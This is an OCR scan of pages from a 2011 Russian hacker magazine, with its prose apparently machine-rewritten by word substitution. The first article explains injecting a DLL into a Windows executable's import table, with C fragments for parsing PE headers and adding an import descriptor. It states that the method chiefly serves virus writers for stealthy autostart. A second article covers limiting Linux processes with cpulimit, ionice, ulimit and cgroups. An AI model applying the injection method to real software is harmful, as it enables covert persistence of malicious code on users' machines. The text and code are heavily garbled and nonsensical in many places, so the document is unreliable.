OOIIИOOO 0001К000

007'JOOOO 00063000 OOIIИOOO

00(][9000 OOIIИOOO

00035000 00011000

~

~ ~~

0 j ·1

во

~

i!)c,\..ndows\system32\sNwooi.cl

~"\..ndows\syst<m32\<hel3.cl

040f0000

Processes lo4ded: 00 Импорт

00027000

=:: sH

Get()penfieШmeW

ChooseFontW GeiRel11eW

~"\..ndows\system32\seШ32.cl

FfffFffF FfffFffF FfffFffF FfffFffF Ffffffff

FfffFffF

POC)85eiЦ>I)IgW

~ --=,-~~~·Ul.~~

-- --

00400000 00500000 00<00000 00400000 00400000 00400000 00400000 00400000 00400000 00400000 01000000

ОЕМ~rг========================================================

Lood Con/io Di'ectory Add-ess Та.

'~-;xmi ""iiXii1 _japt;oм~Нooc~e< , Fie- 0l

в,tesanlostpogo

мnmum~

00000170 00001214 000012011

---,

Pogesinfie

-

IXIOOiiiC

- [Reod 011ly]

005 Не~ Inforrмtions [tt;X]

ns Di'ectory

Oeloy -

PID OIXJ01128 00000968

~--:=:::=::=::=-;+--== =:=-ьr ОООЗIЗSО

Di'ectory

__________________________________

[1-ЕХ]

ООО4СООО

м

-...,, 0729748КЬ/4035588КЬ

notepad .exe на PETools

«таб лица импорта>>. В этой структуре содержится данные об фолиант ,

01

какие функции равным образом с каких DLL используются во программе. Именно на основе таблицы импорта загрузчик исполняемых файлов Windows принимает решения: какие динамиче ские библиотеки подгружать на

Ты далеко не ошибся,

э в таком случае РЕ-файл

else

01 Oops!!! }

реминисценция программы , а какие- нет.

Логично предположить, что такое? с целью загрузки своей собственной

DLL

Следующим шажком я должны откопать таблиц у импорта. Для сего

полно только одну каплю соскоблить таблицу импорта , раз ее

обратимся ко структуре IMAGE_OPТIONAL_HEADER , которая входит во

микроформат здорово документирован . Но предварительно нежели предпринимать непо­

смесь

сре дственно кодингом, ну-ка подробно разберемся во структуре

сосредоточение изо структур IMAGE_DATA_DIRECТORY. Каждый деталь массива

РЕ-файла равным образом узнаем, что показать перед этой таблицы.

IMAGE_NT_HEADERS. В IMAGE_OPТIONAL_HEADER будем подыскивать

описывает какую-нибудь важную на исполняемых файлов таблицу. Треб ую щаяся нам рэнкинг об импорте содержится на элементе

РЕ-ФОРМАТ И ТАБЛИ

А ИМПОРТА

не без; индексом IMAGE_DIRECTORY_ENTRY_IMPORT или — или 0. Сама устройство

Любой исполняемый обложка Windows имеет 005 Неаdег. Он находится

I MAGE_DATA_DIRECTORY выглядит следующим образом:

во самом начале файла да бульон его степь e_magic по части смещению eeh ДОЛЖНО со содержать ЧИСЛО

0A4Dh (IMAGE_DOS_SIGNATURE) ИЛИ, говоря <<MZ>>. Поле e_lfanew все праздник а структуры IMAGE_DOS_HEADER хранит сме щение получи РЕ­ на человеческом языке, латинские буквы

из-за головок файла. Структуру, описывающую таковой заголовок, позволяется

Описание

IMAGE_DATA_DIRECTORY typedef struct _IMAGE_DATA_DIRECTORY DWORD VirtualAddress; DWORD Size;

отрыть на файле winnt.h подина названием IMAGE_NT_HEADERS. П ервое ее фон зто

DWORD Signature, которое надо охватывать число 4550h или, иначе, <<Р Е » . Таким образом, предварительно началом работы с файлом нам нужно ревизовать существование во нем в соответствии с нужным смещениям сигнатур MZ равно РЕ, с целью убедиться, который предварительно нами действительно РЕ-файл. Проверка

вещи файла

ко РЕ-формату

ВУТЕ *buff=new BYTE[file_size);

01 ... читаем

РЕ-файл во переменную buff ...

i f ((PIMAGE_DOS_HEADER)buff)·>e_magic TURE)

IMAGE_DOS_SIGNA·

{ PIMAGE_NT_HEADERS nth=(PIMAGE_NT_HEADERS )((DWORD) ((P IМAGE_DOS_HEADER)buff) ->e_lfanew) + (DWORD)buff); i f (nth->Signature==IMAGE_NT_SIGNATURE)

ХАКЕР

01/154/2011

Hiew во действии

011


КОДИНГ

Вся оттиск во одной картинке

-----J

t y pe d ef

L

str uct _IМAGE_OPТIONAL_HEADER

{ ВУТЕ ВУТЕ

MajorLinkerVersion; MinorlinkerVersion;

{ WORO e_magic;

DWORD SizeOfUninitializedData;

WORD е_сЫр;

OWORD OWORD DWORD DWORD

е_ ср;

WORD

WORD e_crlc; WORD WORD WORD WORD

e_cparhdr; e_minalloc; e_maxalloc;

DWORD TimeDateStamp; OWORD ForwarderChain; OWORD Name; OWORD FirstThunk; } IМAG Е_ IMPORT_ OESC RI PTOR;

AddressOfEntryPoint; BaseOfCode; BaseOfOata; ImageBase;

OWORD SectionAlignment; OWORO FileAlignment;

WORD MajorOperatingSystemVersion; WORD MinorOperatingSystemVersion;

e_ss;

WORD e_sp;

WORD MajorimageVersion; WORD MinorimageVersion; WORD MajorSubsystemVersion; WORD MinorSubsystemVersion; DWORD Win32VersionValue;

WORD e_csum; WORD e_ip;

WORD e_cs; WORD e_lfarlc;

WORD e_ovno; WORD e_res [ 0];

DWORD SizeOflmage;

WORD e_oemid; WORD e_oeminfo;

DWORD CheckSum;

L

type def struct _IМAGE_IMPORT_BY_NAМE { WORD Hint; ВУТЕ Name[ l ];

DWORD SizeOfHeaders;

01 бери самом деле ., в этом месте невыгодный один 11 кто хочешь длины ASCIZ-cтpoкa IМAGE_IMPORT_BY_NAМE;

}

LONG e_lfanew;

OWORD SizeOfStackCommit;

а

{ DWORD VirtualAddress; DWORD Size;

DWORD LoaderF lags;

OWORD NumberOfRvaAndSizes; IМAGE_DATA_DIRECTORY OataDirectory[ lб

}

_IМAGE_DATA_DIRECTORY

- i typedef str u ct

DWORD SizeOfHeapReserve; DWORD SizeOfHeapCommit;

}

J;

IМAGE_DATA_DIRECTORY;

IМAGE_OPТIONAL_HEADER;

L

_IМAGE_NT _HEAOERS

{

type d ef struct _IМAGE_ THUNK_DATA {

uni on { OWORD ForwarderString; 01 РВУТ Е DWORD Function; 11 POWORD

DWORD Signature; IМAGE_FILE_HEADER FileHeader; IМAGE_OPТIONAL_HEADER32 OptionalHeader;

}

байт,

WORD Subsystem; WORD DllCharacteristics; DWORD SizeOfStackReserve;

WORO e_res2[10]; } *PIМAGE_DOS_HEADER ;

ч ty pe d ef st ruc t

{

Characteristics; OriginalFirstThunk;

};

DWORD SizeOfCode; DWORD SizeOflnitializedData;

t y pe def str uc t _ IМAGE_DOS_HEADER

_IМAGE_IMPORT_DESCRIPTOR

typedef str u ct un ion { DWORD DWORD

WORD Magic;

DWORD Ordinal; DWORD Ad<J..r2'ss0f0ata; } ul;

*PIМAGE_NT_HEADERS32;

}

01

PIМAGE _IMPORT _ВУ_NАМЕ

IМAGE_THUNK_DATA;

Как вынуть душу вплоть до импорта

} IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY;

/1 RVA таблиuы импорта DWORD impRVA=пth->OptioпalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY _IMPORT]. VirtualAddress_;

Поле ViгtuaiAddгess охватывает эдак называемый RVA [гelative viгtual

~атель первой

addгessl, так вкушать несуществующий адрес, базированный про

PIMAGE_SECTION_HEADER

ImageBase. Если RVA таблицы импорта у нас в равной степени 0eeeh, а ImageBase - ee4eeeeeh, в таком случае наш брат получим глубокий кажущийся домицилий равный ee4e1eeeh.

секuии iпFileSec

IMAGE_FIRST_SECTION(пth);

/1

числовой показатель секции,

WORD

impSeciпdex

идеже н аходится табличка им п галдеж т а

=- 0;

Но после этого автор сих строк встречаем на первом месте препятствие- заниматься от бинарни­ ком наша сестра будем бери жестком диске, никак не загружая его на память. Вернее,

for ( si ze_t i=е ; i

автор сих строк его загрузим на свой буфер, хотя отнюдь не будем расставлять секции равным образом

{

<

поs- 0 ;

i++)_

i f (impRVA >=inFileSec[i].VirtualAddress && impRVA < inFileSec[~+ 0 ].VirtualAddress)

остальные важные части РЕ-файла в соответствии с своим местам на виртуальном

адресном пространстве. Поэтому нам надлежит сделать выкладки физическое

перемещение таблицы импорта во файле [или, говоря по-другому,

RAW offsetl. Для зтого наш брат должны определить, на что за секции РЕ-файла находится lmpoгt tаЫе, произвести вычитание изо RVA таблицы RVA

impSecindex=i; break;

секции да добавить полученное контингент для PoiпterToRawData секции.

}

Сама матрица секций [объектов! находится напрямую вслед за РЕ Неаdег, а сумма элементов на этой таблице определяется по­ лем NumbeгOfSections структуры

IMAGE_FILE_HEADER.

Вооружив­

шись этими знаниями, попробуем обоссать код, тот или иной высчи­

тает физическое отстранение таблицы импорта во модифицируемом

01

физическое снятие табли цы им п орта во файле

DWORD impRawOffset=inFileSec[impSecindex]. PointerToRawData + impRVA;

исполняемом файле .

ПРАВИМ ИМПОРТ Считаем

U ...в

RAW Offset в целях Import ТаЫе buff у получи вместе с перечитанный РЕ - обложка . .•

После того в духе я узнали приветствие таблицы импорта, не запрещается заняться непосредственным внедрением

DLL. Но попервоначалу надлежит разбирать

структуру lmpoгt ТаЫе. По адресу, каковой наш брат получили, нахо-

PIMAGE NT HEADERS пth=_(PIMAGE_N1_HEADEB~)(( DWOIOL) ((PIMAGE_DOS_HEADER)buff)~e_lfaпew) + ( DWORD )buff);

дится оглавление импорта. Фактически сие конгломерат с структур в виде

IMAGE_IMPORT_DESCRIPTOR.

На каждую импортируемую динамическую

библиотеку надо наравне мало-мало одна переписывание

L/

для ол-во со ек ци й во фа й л е

WORD

012

поs

=

пth->FileHeader.NumberOfSectioпs;

IMAGE_IMPORT_ DESCRIPTOR . Давай взглянем, почто а представляет с себя эта структура.

ХАКЕР

01 / 054/2 011


ОLL-хардкодинг

Описание

IMAGE_IMPORT_DESCRIPTOR

BY_NAME в свою очередь следует разместить во свободном nространстве тела исполняемого файла . При этом подобает вдобавок поменять адреса равным образом

typedef struct _IMAGE_IMPORT_DESCRIPTOR union { DWORD Characteristics; DWORD OriginalFirstThunk;

размеры данных в и

DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT) DataDirectory[IMAGE_DIRECTORY_ENTRY_IAT) . Задача сия требует хорошего багаж РЕ-формата инекоторого

напряжения мозга. Альтернативный вариант- впихнуть ан фуй касательно

}; DWORD TimeDateStamp; DWORD ForwarderChain; DWORD Name; DWORD FirstThunk; } IMAGE_IMPORT_DESCRIPTOR;

добавляемой библиотеке из первых рук на те места, идеже возлюбленная да была бы, неравно

Тут нас интересуют три nоля:

Благодаря тому, что такое? сообщение об импортируемых именах может

Name- сие RVA

фигурировать раскидана по мнению всему файлу, наша сестра имеем достижимость стоит

бы возлюбленная добавлялась тама линкером, а малограмотный нами. Но на этом случае нам придется подбить во импорте по сию пору

RVA равным образом намотать себе на ус то, что такое? как будто

nонадобится встряхивать структуры, которые не выделяя частностей отнюдь не имеют никакого отношения ко имnорту.

Первый вариант, для муж взгляд, куда как попроще на реализации .

ваться нулем

Name, OriginalFirstThunk равным образом FirstThunk. импортируемой DLL. Имя надо заканчи­

имени

IDxDDI,

хотя возле этом длительность этой строки должна составлять

пластично ее изменять . Более того, твоя милость аж можешь выдумать паче

кратна двум. То есть, разве да мы от тобой импортируем keгne132.dll, так пикет

изящное решение. Но, повторюсь до этого времени раз, что-нибудь заранее нежели начинать следовать

строки имени во байтах с от завершающим нулевым короче равна

это, потребно расколупать неграмотный единодержавно РЕ-файл .

03, что такое? отнюдь не кратно 0. Позтому во конце наша сестра должны примолвить до оный поры нераздельно

ПОДГОТАВЛИВАЕМ

нолик.

OгiginaiFiгstТhunk включает во себя

RVA

массива

IMAGE_THUNK_DATA,

DLL

Когда да мы от тобой разобрались от внутренним устройством исполняемых

каковой в долгу иссякать нулевым элементом . Сама состав

файлов

IMAGE_THUNK_DATA- сие без труда двойное слово, которое во большин­ стве слу чаев является RVA структуры IMAGE_IMPORT_BY_NAME . В этой структу ре хранится nоле Hint размером 0 байта, которое служит для ускоре ния поиска имен во импортируемой DLL, равно сам

импорт, минута начать самой

псевдоним импортируемой функции, которое вдобавок требуется фигурировать выровнено на границу на двушник байта.

Windows равно написали код, который-нибудь добавляет библиотеку в DLL. Для основные положения дай взглянем получи

шаблонную реализацию главной функции динамической библиотеки.

DllMain BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)

FiгstТhunk- сие в действительности коnия OгiginaiFiгstТhunk, в таком случае лакомиться она содержитте но

RVA

получай

который да OгiginaiFiгstТhunk,

IMAGE_THUNK_DATA,

switch (ul_reason_for_call)

хотя загрузчик РЕ-файлов изменит ее начинка быть связывании из

{

библиотекой. Там будут околачиваться адреса имnортируемых функций.

case DLL_PROCESS_ATTACH: : :MessageBox(NULL, "Загрузилось" , "Выполняем адрес DLL" , МВ_ОК); break ; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break ;

Теперь, когда-когда автор знаем, вроде устроены кишки импорта на РЕ­ файле, автор сих строк можем вчинить инжектить свою

DLL.

Для сего нам полагается

наболтать во директорию импорта безошибочно заполненную структуру

IMAGE_IMPORT_DESCRIPTOR. Добавляем

01

IMAGE IMPORT_DESCRIPTOR

первая состав

IMAGE_IMPORT_DESCRIPTOR

во таблице

импорта

}

PIMAGE_IMPORT_DESCRIPTOR iid=(PIMAGE_IMPORT_DESCRIPTOR) (impRawOffset + (DWORD)buff);

return TRUE;

01

В параметре ul_гeason _foг_ca ll да мы со тобой nолучаем причину, соответственно которой

ищем увенчающий деталь таблицы

while (iid->Name !=е ) iid++;

была вызвана

DIIMain. В случае, нет-нет да и этой nричиной является за­

пись насчёт нас во таблице импорта ехе-файла, на ul_гeason_foг_call наш брат по­

01

лучим DLL_PROC ESS_AПACH. Далее можем претворить какой приглянется код,

заполняем структуру IМAGE_IMPORT_DESCRIPTOR

какой-никакой только лишь захотим, во контексте процесса, во исnолняемый обложка

filliiD(iid);

которого наш брат заинжектили нашу

01

iid++; ZeroMemory(iid, sizeof (IMAGE_IMPORT_DESCRIPTOR)); Но тогда вкушать два проблем. Во-первых, nри добавлении очередного элемента размер массива увеличится получай sizeof(IMAGE_IMPORT_ DESCRIPTOR). Скорее всего, сие приведет для тому, что такое? пишущий сии строки затрем делянка

инфы, в которую ссылается OriginalFirstтhunk. Во-вторых, по­ мимо

IMAGE_IMPORT_DESCRIPTOR,

нам нужно сызнова сотворить равным образом наложить доверху

FirstThunk,

а в свою очередь ан фуй

DIIMain, в таком случае на таблице

импорта полно где раки зимуют общей сложности одну функцию с нашей библиоте­

ки. Это нам получай руку, приближенно на правах предмет внимания не без; нехваткой места на добавления доnолнительных данных по отношению

массивы соответственно адресам OriginalFirstтhunk равно

DLL.

Поскольку огульно ни туды и ни сюды нам адрес выnолняется во

добавляем увенчающий свежий штучка

DLL довольно-таки

актуальна. Главное,

так чтобы наша DLL экспортировала имя, которое автор укажем во импорте.

ДЛЯ ЧЕГО ЭТО НУЖНО Все, что-нибудь мы на этом месте описал, на первую цепочка пригодится вирмейкерам. Наnример, позволено примолвить свою автозагрузке

DLL для программе, которая овчинка выделки стоит в Windows. Даже самые умные пользователи вряд ли ли

в области RVA на равнина Name . Для лишь сего нужно обнаружить свободное район во

найдут причину непонятного поведения своего компьютера [если ты,

РЕ-файле, чтоб безвыгодный уничтожить самую малость нужное.

конечно, запрограммируешь сие действия во DIIMainl.

Самое nростое решение- сие перепереть таблицу на директорию

Также экой подходец дозволено извлекать пользу к перехвата

API

на испол­

импорта [массив, пупок развяжется автор добавим IMAGE_IMPORT_DESCRIPTORJ, во

няемом файле. Есть, конечно, побольше nодходящие чтобы сего способы,

заключение который-нибудь секции. Так равно как секции на РЕ-файле как правило

да да средство не без; хардкод-инжектом

выравниваются согласно какой-либо границе, так у нас достоит существовать до­

DLL имеет монополия бери существование.

Но во любом случае чтобы правильной реализации токмо после этого

стато чно места, воеже впихнуть тама нужные причина . Таблицы согласно

описанного потребуется хорошее знакомство РЕ-формата, корректный

адресам OriginalFirstтhunk равным образом

да убедительный код, а вдобавок длительные тесты получи разнообразных

FirstThunk,

кличка инжектируемой

DLL в соответствии с адресу во Name, а в свой черед сосредоточение изо структур IMAGE_IMPORT_

ХАКЕР

01 /154/2011

nрограммах. :Х:

013


Евгеня Зобнин lexecbit.гul

Поб~да в воине

вслед за ресурсы ОГРАНИЧИВАЕМ LINUХ­

ПРИЛОЖЕНИЯ В РЕСУРСАХ СИСТЕМЫ

I:J:Iiullllli Е сть много причин насчёт г ра н ичивать п риложе н ия во ресурсах. Н а п ри­ мер, некото ры е изо них промежуток времени что до т времени дают накладка равным образом начинаю т по мнению

полной г рузи т ь сердце компьютера !при ве т Adobe l. Постоя нн что касается п ереза п уска т ь их сли ш комок утомите л ьно равно неин т ерес н о, да есть ли усишко т а н обвить та для ому

возле л ожению сокращение получи и распишись

00% п роцессарного време н и- оно н е

сможет расстроить твоей работе. Таким но образом мож н касательно по части г раничи­ вать равно н еко т орые вя л отеку щ ие судебное дело ы , бери пр име р ко д ирование

видео, которое по-иному буд ет либо т ормозить на есь ос т ал ь утнапиштим софт,

либо двигать от п ать с подачи д ико реву щ его п ро ц ессар н об г относительно невольник ера. Чтобы занимающийся н а фо н е

wget отнюдь не меш л веб-серфи нг у, д ос т у пн ый

ему интер н ет-канал не запрещается забрать получи и распишись п по отношению л овину что касается т шири ны реа льн по части ­

го. Ч тобы торрент-к л иент во по отношению д равным образом н п рекрас н ый моме нт н е забил престиж ь д иск, кубатура д иска с целью этой пр в рассуждении г ра м пишущий сии строки мож н насчёт ог ранич да ть . В се э т о можно изготовить от п омо щ ью прос т ых во равным образом не без; п ользо на а н равным образом да ути лит, а и

В

Linux

хватает целый ряд средств

ограничения приложений в возможностях . Это равно стандартные права доступа, равно брандмауер , и такие комплексные системы,

как бы

SELinux

равно Аррдгmог. Но наравне

обусловить приложения во ресурсах?

мо щ нейшего механизма cgгo u ps, невыгодный беспричинно д авно за пределами д рен н ого во Liп ux.

ПРОЦЕССОРИ ЕГО ЯДРА Д умаю, целое знают в отношении самом без затей м равным образом у н равно на ерсальном мето д е огр фактически и­

чения приложений во процессо рн ых ресурсах. Это в такой мере н азываемый приоритет ис п олнения, значени ваш покорный слуга ко т в рассуждении р в рассуждении г насчёт ко л еб л ются через

09.

-2 0 д по отношению

Возможность изменени автор этих строк пр иоритета п эскер на что до л яе т нам у п рав л ять

п л анировщиком процессов, указывая ему для то, по образу да е п р оцессы

lприложе н равно пишущий эти строки l д олжны сообразно л внушать в большинстве случаев процессар н что до г в рассуждении вр еме н и. Ес л и, н апример, ты да я вслед за п устим me n codeг из самым н изким приорите т ом исполнения:

Например , сделать упор одному приложению

00 % процессарного времени, другому- 0% оперативки , а третьему- общей сложности 028 Кб ширины интернет-канала? Об этом да мы вместе с тобой и поговорим на данной статье .

$ nice -n 0 0 mencode r -ovc la vc -lavc opt s \ v codec;mpeg in- vi deo . av i

out -v id eo . avi

То дьявол никаким об р азом н е вместе с м ожет помочь н а ш ей рабо т е вместе с си ­ стемой. П роцессы m encode г буду т безвыездно гда нахо д да т ься во самом ко нц е оче р е д равно равно соответственно л у ч ат у п ра на ле н ие так л ько т насчёт гд а, в некоторых случаях nр по части ц ессо р н е

буд е т нужен никакому д ру г ому рядом л оже н ию. Каза л ос ь бы, э т об заме­ ч а т е ль н ы й мето д огра нич е н равным образом моя персона п ри л оже н ий на р есу р сах n ро ц ессора,

а спирт работает так ль ко т олько на книжка вместе с л учае, ко гд а есть ть ко н ку р е нц равно я за р есурсы nро ц ессо р а. Е сл равным образом но из-за п усти т ь n ри л ожение вместе с низким

-

Команды

равным образом

близ относительно рит е т ом, ко гда во системе н ет дру ги х ак ти на ны х п р да л ожений ! на­

пр имер, н по части ч ью ! , по части н относительно на се рав н что до п в отношении лн ос т ью заг р уз ит п ро ц ессо р ! что, в свою об ч е р е д ь, nриве д ет для п относительно дн мы т ию ч а ст с ы рабо твоя милость для ц ессо р а, е г по части

н агреву равным образом однажды г в отношении н у охл а ж д ающе г в рассуждении куле р а l . В таких си т уа ц иях сле д зеленый т

nice

ionice не грех

Утилита

cpulimit отнюдь не

складывает

отдача всех

комбинировать,

имеющихся nроцессорав системы,

образуя цепочки

отчего с намерением сделать возможным

следующего вида:

nрограмме наnоловину найти дело

«nice -n 09 ionice -с2

четверка х Ъядерный nроцессор,

-n7

следуетуказывать

приложен ие н .

000%.

п рименят ь др угие ме т об д ы. н а пр име р ут да ли т у Ут вилайет равно та

cpulim it

cpu limit .

н е равно зме ня ет пр иори те т прил ожен да я, а n р осто

приостанав л ивает его ис п что до лн е ни е во моме нты , когд а объединение тр ебле ни е

ради ц ессара выхо д ит вслед граница из-за д а нн насчёт г касательно ли ми т а !это д е л ается с помо щ ью бана л ьного си г получи и распишись ла SIGSTO PI. П в рассуждении пр об ш нашел тв ии н екоторого време н да р абота приложения возоб н в рассуждении вля ется из п омо щ ью от игн ала

ХАКЕР

01/154/2011


Победа во войне вслед заряд

SIGCONT,

по причине чему создается надежда замедления работы

Утилита

cpulimit может подвизаться на Liпux, FгeeBSD да других РОSIХ­

совместимых ОС. Установить ее позволительно не без; через дистрибутивного па кета:

cpulimit. Чт обы лукнуть при­ ложение перед управлением cpulimit, полно провести в жизнь следую­ щую команду : cpulimit - -ехе приложе ние - -limi t доля _ sudo apt-get

>

ls / mnt/cgroups / io_merged io_queued Ыkio . io_service_bytes Ыkio . io_serviced Ь lk io. io_seгv ice_ t ime Ыkio . io_wait_time Ы k io . reset_stats

cpuset .memory_migrate cpuset . memory_pressure

Ыkio .

приложения.

iпstall

процессора. Ограничить позволяется да сейчас работающие процессы:

cpulimit --pid 0960 --limit 05. Но сие вновь невыгодный все. С через cpu limit

Ыkio .

cpuset . memory_pressuгe_enab 0ed

cpuset . memory_spread_page cpuset . memary_spгead_s 0аЬ

cpuset . mems cpuset . sched_load_ba lance

Ыkio . sectors

cpuset . sched_гe 0ax_doma i n_leve 0

throttle . io_serv ice_bytes throttle. io_serviced Ыkio . thrott le. read_bps_dev ice Ы k io. throt t le. read_ iops _dev ice Ы k io . thrott le . wri te_bps_dev ice Ы k io . throt t le. wri te_ iops_dev ice Ыkio. t ime Ьlkio .weight Ы k io. we ight_dev ice cgroup . со lone_chi ldren cgroup. event_control cgroup . procs cpuacct . stat cpuacct . usage cpuacct . usage_percpu cpu .rt_period_us

cpu . shares de v ices .allow dev i ces. deny devices . list me memory.fai lcnt memory . force_empty memoгy , 0 imi t_ in_bytes memory . ma•_usage_in_bytes memory. move_charge_at_ immigrate memory . numa_stat memory . oom_contro 0 memory. soft_l imi t _ in_bytes

Ыkio . Ьlkio .

ради це ссами не грех управ­

лять динамически. П ользователь abcuseг бери форуме ubuпtufoгums.

огg опубликовал красивый скри пт, что си дит для фоне и автоматически содержит сокращение процессарного времени пользу кого

приложений, отъедающих значительнее положенного . Это скрипт, каковой

дозволено выискать в нашем диске [cpulimit_daemoп.sh). Ег насчёт нелишне ско­ пировать во обложка /usг/local/biп равно трансформировать первые фошка строки:

# vi /usr/local/bin/cpulimit_daemon.sh # Максимальный доход съедаемого процессара CPU_LIMIT;20 # Интервал проверок на повремени

memoгy.

stat

memory , swapp i ness

memory. usage_in_bytes

Содержимое каталога /mnt/cgгoups

DAEMON_INTERVAL; З

Ш Группа gля пользоВателя

# Черный меню ограничиваемых процессов # Если пуст, полноте прилагаться мел список BLACK_PROCESSES_LIST;npviewer.bin # Белый перечень - малограмотный заключать сии процессы WH ITE_PROCESSES_LIST;

gгoup регm

#

Кто может упраВлять лuмuтамu?

admin { uid=UID

пользоВателя

}

Здесь автор указал лишь одно ограничиваемое приложение­

#

прviеwег.Ьiп, сие загрузчик плагинов на браузеров !обычно некто под­ гружает Flash-плeep ото

me { {

Кто может gоБаВлять процессы В гуппу?

task { uid=UID

Adobe, каковой славится своей пр ожорливо­

стью ). Ты можешь расклешить блэклист в соответствии с своему усмотрению. Н ужно

пользоВателя

наградить скрипту власть получай исполнение:

}

#

$ sudo chmod 000 /usr/ bin /c pulimit_daemon. sh Д алее возьми не без; диска скрипт cpulimit, ско п ируй его на библиография /etc/ iпit.d равно рот н ови н а него правильные власть поперед от т упа :

$ sudo chown root:root /etc / init.d /cp ulimit $ sudo chmod 055 /etc / init .d/cpulimit

К какuм поgсuстемам прuВязана сия группа?

cpu { } memoгy { } Ыkio { } group me/npvieweг { cpu { cpu.shaгes=100;

Запусти равным образом добавь во автозапуск:

memoгy

$ sudo /etc /i nit.d /c pulimit start $ sudo update-rc.d cpulimit default s

{

memoгy.limit

in bytes= •

000М;

(!i!Jg,J , Jil. нg ,J,JMi3 ,J,JI

Теперь указанные во хруст т е процессы будут подо наблюдением и никогда безвыгодный съедят более положенного куска процессора.

ПАМЯТИ МНОГО НЕ БЫВАЕТ

Редактируем конфиг cgгoups

Однако з д есь кроется п одвох : в рассуждении дна жды снизив лимит, его уж

Ограничить мера доступной процессу п амя ти до этого времени проще. В любом

возбраняется взмести опять !это готово ради безопаснос ти) , оттого

РОSIХ - совместимом командном интерпретаторе убирать главенство

уловка не без; установкой лимита, запуском нужного приложения равно его

ulimit, которая позволяет обслуживать некоторыми ограничениями,

последующим сня т ием безвыгодный пройдет. Выйти изо этой ситуации можно,

накладываемыми сверху порождаемые ей пр в отношении це ссы !для сего ис­

запустив новоизобретённый сигнальный программа да установив предел поуже

пользуется систем н ый картель setгlimit). По умолчанию инструктивный

во нем. Д елать сие автоматизированный необязательно, полно организовать про­

объяснитель деньги безвыгодный огра ничив ает разме р оперативной п амя ти ,

не двигаться! скри пт :

доступной приложениям, на нежели позволено убе дить ся, вслед за п устив следую­

#!/bin/sh ulimit -m $1 $2

щую команду :

$ ulimit -m unlimited

Сохра нив э т по отношению т не без; крипт во обложка -/Ьiп/ml imit равно губы н овив для н его флаг Чтобы сторнировать это, вплоть до статочно вручить размер лимитура сверху

исполнения, дозволяется совать приложения со что касается гр аниче ни ем для объ-

реминисценция во качестве аргумента оболочка нды . Например, учредить предел

ем доступной памяти следующим образом:

до потреблению памяти во

xterm.

000

Мб позволено таково

0100 • 0024

Кб;

000

Мб):

mlimit $( (50*1024))

Почти в таком случае но самое делает употребление подина названием softlimit

$ ulimit -m $((100*1024))

ХАКЕР

01 / 054/ 0011

l goo.gi/Qгc7k ).

015


UNIXOID $ sudo ionice -с2 -n7 traпsmissioп

АНАЛОГСУПЕРПАТЧА В 000 СТРОК, УСКОРЯЮЩЕГО ПРОИЗВОДИТЕЛЬНОСТЬ СИСТЕМЫ

тетом ввода-вывода. В произвольный минута пальма первенства э ведь го приложения

Пишем во обложка /etc/гc.local сле дую щ ие строки:

$ sudo ioпice -сЗ -р 0234

mount -t cgroup cgroup /sys/ f s/c gr~p /cp u mkdir -m е777 /sys/ fs /c group/c pu / user

Эта отряд запустит торрент-клиент со самым низким приори­

не запрещается буд е т измени ть вместе с через по сию пору того но ioпice. Например, не без; ле­ дую щ ая общество пасть н ови т первое место класса

ldle

пользу кого процесса

0234:

Такой приемка удоб н по отношению пускать в ход во слу ча ях , рано или поздно дополнение

cpu

начинает не без; лиш кусок во всю мочь сидеть со жестким ди ско м равно стопо ­

рит весь оста льны е пр оцессы. Убивать е г относительно жалко, а закачаешься т остановить

Исполняем их:

работу полностью возможно. Также дозволено лимитировать дополнение во внутренние резервы вслед 14 си

$_ sudo sh_Let!J_cc .local

относительно до е л е нн насчёт го объема данны х получай ди ск. Во вс ех н иксах вкушать п в отношении д­

Создание файла -/.config/autostaгt/cgгoup.sh следую щ его

держка ди сков ы х квот, которые не грех ис п относительно л ьзова ть для того установки

со держания:

лимитура возьми масштаб черство го диска интересах каждого пользователя. Этот а

mkdir -m е7ее /sys/fs /cgroup /c pu / us er /$$ echo_j$ ~/ sy2}~~roup Lcpu/usecJ$$L!asks

конструкция подойдет равным образом с целью ограничения индивидуальных прил ожений, достаточно только лишь запуска ть их из прав ами разных юзеров. Н апр равно мер, если тянет ограни чи ть границы дискового п рос тр анства про програм­

Перезапуск графической оболочки.

ты да я tгansmiss i oп

000 г равным образом г абайтами, должен изготовить сле д ующее :

Добавляем на систему нового пользователя !пусть его фамилия хорэ

0.

quota_100gb]:

$ sudo adduser quota_leegb ПОЛОЖИТЕ ДИСК НА МЕСТО Теперь поговорим что касается дисках . Е вместе с ть как бы партминимум двум об л акробат воздуха ти , во которых

дозволительно сузить приложения около р аботе от д иском: а] приоритет ввода-вывода , какой не возбраняется сниз ить в целях в отношении тд ельно взятых прило­

жений, с намерением они неграмотный загружали жес т маз круг равно безграмотный заслон либо работу

других приложений равно всей сис т емы во целом; б ] повальный масштаб доступ­ ного пространства равным образом пиковый размер сохраняемых файлов,

упра вляя которыми, мож н относительно избежать ситуаций, в некоторых случаях что касается дна софтина полностью заполняет холодный пластинка своими данными.

Первая теорема решается вместе с через утилиты около незамысло­ ватым названием i oпice. Как да особенный сотоварищ сверх приставки

io,

симпатия по­

зволяе т устанавлива ть индивидуальные присутствие оритетына отдельный про­ ц есс, при всем том действует во отношении планировщика ввода-вывода,

а отнюдь не планировщика процессов . Ут илита ioпice д елит однако возможные

tap- 02:813:07 up 03 days , 00 min . 0 users . Tasks: 034 total, 2 runпing , 026 sleeping,

L...... Swap:

09652k cached

fгее,

ljij!.!Щ

В

00

В

В

В

В

00

В

В

В В В

08 20 2В

054m 05m 0716 0 261m 0576 0128 S 15Bm 01m 088В 0 85Bm 03m 092В 0 852m 06m 0624 0 8 В В S 1В784 014В 828 R 1B94m 099m 05m 0 SBlm 007m 08m S 852m 04m 0464 S 3916 016 088 0

0 Э

0 1 1

0.3 094:37.В1 Х 0.4 058 :83.76 chromium В.6 12:53.15 l il yteгm В. 0 1:15. В4 chгomium В.8 1:42.79 chгomium

В

В.В

В

B.l 9.9 5.3 0.7

В В В

B:Bl.lВ lcwoгkeг / 0 :8

B:BB.BS top 28 : 05 .8В chгomium 57:81.131 chгomium 1:27.12 chгamium

В

В

В

S

В В

В.В В.В

init

00

В В

В :26 . В7

root

0 :01 . 02

kthгeadd

08

В

В

В

В

S

В

0 .8

0 :85 . 01

